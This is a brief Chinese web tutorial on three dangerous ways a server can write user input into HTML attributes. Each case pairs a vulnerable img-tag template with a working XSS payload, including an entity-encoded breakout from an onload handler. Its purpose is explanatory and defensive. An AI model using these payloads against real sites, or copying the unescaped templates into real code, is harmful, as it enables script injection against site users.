• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    服务端输出HTML属性的几种危险情况

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

  • 没有过滤或转码直接输出
    code:
    <img src=":{src}" >
    hack:
    <img src=" xxx:x"onerror=alert(1)// " >
  • 过滤了单引号和双引号
    code:
    <img src=:{src} >
    hack:
    <img src=xxx:x onerror=alert(1) >
  • 对内容进行了HTML实体编码
    code:
    <img src="xxx:x" onload="open(':{src}')" >
    hack:
    <img src=xxx:x onerror="open('&#x27;&#x29;&#x3B;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x2F;&#x2F;')" >
    final:
    <img src=xxx:x onerror="open('');alert(1)//')" >
    • ,www.xuhantao.com,涛涛电脑知识

  • 上一篇:XSS攻击过滤函数
  • 下一篇:PHP防止暴力破解密码
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1